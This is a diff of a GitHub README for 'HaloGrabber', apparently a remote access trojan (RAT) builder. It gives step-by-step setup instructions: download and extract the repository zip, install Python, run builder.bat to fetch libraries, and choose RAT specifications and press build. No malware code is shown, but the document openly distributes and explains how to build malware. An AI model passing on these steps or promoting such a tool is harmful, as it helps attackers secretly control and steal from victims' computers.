nicolas1100/HaloGrabber/README.md

 HOW TO SETUP :

+On the github page, navigate to https://github.com/nicolas1100/HaloGrabber/blob/main/HaloGrabber.zip or just press the link.

+Press the download button on the upper right of the page to download the zip file.

+Extract the HaloGrabber zip file.

-On the github page, navigate to blob:https://github.com/c37e7186-5778-42dd-ae37-d25948c35ee9 Download and install Python 3 or any higher version.
+Download and install Python 3 or any higher version.
 (Make sure to enable the Add to PATH option.)
-Download HaloGrabber.
-Extract the zip file.

 Navigate to the HaloGrabber folder and double click builder.bat file to download the required libraries.

 Choose your specifications for your rat and press build.

 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------